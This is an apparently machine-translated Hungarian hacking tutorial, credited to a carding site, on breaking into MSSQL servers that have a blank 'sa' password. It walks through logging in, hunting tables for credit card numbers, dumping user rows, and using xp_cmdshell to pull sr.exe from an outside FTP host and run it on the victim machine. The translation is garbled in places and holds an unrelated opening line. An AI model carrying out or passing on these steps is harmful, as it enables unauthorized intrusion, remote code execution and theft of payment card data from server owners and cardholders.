A legegyszerűbb módja annak, hogy az SQL-szerver
Három nap múlva, miután látogatást tett a pszichiáter, és figyelembe hideg zuhanyt kezdődik, sőt a folyamatban.
Ezen a ponton, akkor már van egy csomó autó, amelyekről ismert, hogy futnak MSSQL szerver, amely figyeli a szabványos port 1433. Nem tudom, melyik a szerverek már telepítve lemorzsolódás adminisztrátorok, mint te olvasod ezt a cikket érdeklődéssel, és nem zavarja, hogy változtatni az alapértelmezett bejelentkezési SA egy üres jelszót valami tisztességes.
Run QA, a bukkant fel ablak, írja be:
- SQL Server: IP listából naskanennogo segítségével SRA
- Tick indítása SQL amennyiben le van állítva, nem válik
- Kapcsolódás: SQL Server hitelesítés
- Felhasználói név: sa
- Jelszó: üres mező
Abban az esetben típusú üzenetek Belépés beadta a felhasználó „sa” nem megbízható SQL szerver kapcsolat, stb, kattintson az „OK” és próbálja ki a következő IP a listából.
Nos, végül helyett unalmas Bejelentkezés benyújtott, mi kap csak hirtelen megnyílt, tiszta, fehér, ablak az államháztartási típusú „Query 12.11.32.45.master.sa” - elment az SQL-szerver, gratulálok =)
Hit az F8, a bal oldalon van egy lista az adatbázisok található ezen a szerveren. Csak azt, hogy figyelmeztesse: Master adatbázis nevét, modell, msdb Northwind, kocsmák, tempdb olyan szolgáltatás vagy szállított MSSQL példaként - nézik, hogy nincs értelme - mint ahogy az önképzést.
Ha az adatbázis listán, akkor látni valamit, mint OnlineShop (=)), kattintson a kereszt a bal oldalon az adatbázis nevét a legördülő listában - a kereszt a bal oldalon a felhasználói táblák. Itt van egy lista a adatbázis táblákat. Ha rákattint a kereszt a bal oldalon a tábla nevét, akkor kap egy listát a mezőnevek a táblázatban.
Az én saját tapasztalata ütik el az időt, azt láthatjuk, hogy a túlnyomó többsége a nevét táblák és mezők hordoz több értelme - ha az adatbázis számos kártyák, akkor nagy valószínűséggel ez lesz írva CreditCardNumber - vagy a tábla nevét, vagy a tábla neve mezőben.
1. A legördülő listából válassza ki a felső QA nevét a kívánt adatbázist.
2. Port szűz fehér ablak bukvochki lekérdezés típusa:
válassza top 100 * felhasználóktól
Ez a lekérdezés visszaadja a felső 100 táblázat sorait FELHASZNÁLÓK
select count (*) a felhasználó
Ez a kérelem megmutatja a sorok számát a táblázatban FELHASZNÁLÓK
xp_cmdshell „cmd / c echo Admin> ftp1cmd / c echo jelszó >> ftp1cmd / c echo bináris >> ftp1cmd / c echo kap sr.exe >> ftp1cmd / c echo kilép >> ftp1cmd / c ftp -s: ftp1 -d 12.12 .12.12 "
ezt a kérést letölti az FTP-szerver 12.12.12.12 a bejelentkezési név és jelszó Admin jelszó fájl sr.exe
xp_cmdshell 'cmd / c sr.exe'
és ez a kérés indít sr.exe egy távoli gépen SQL-szerver szabályok - amelyek, mint általában, vagy a rendszer DomainAdmins.
Ha valaki még nem sejtette még, xp_cmdshell „dir c: \” meg fogja mutatni a tartalmát a merevlemez C: \.
Minden jog a cikkhez tartozik www.carderplanet.com oldalon.
Itt található az ezt a cikket egy ismerősének: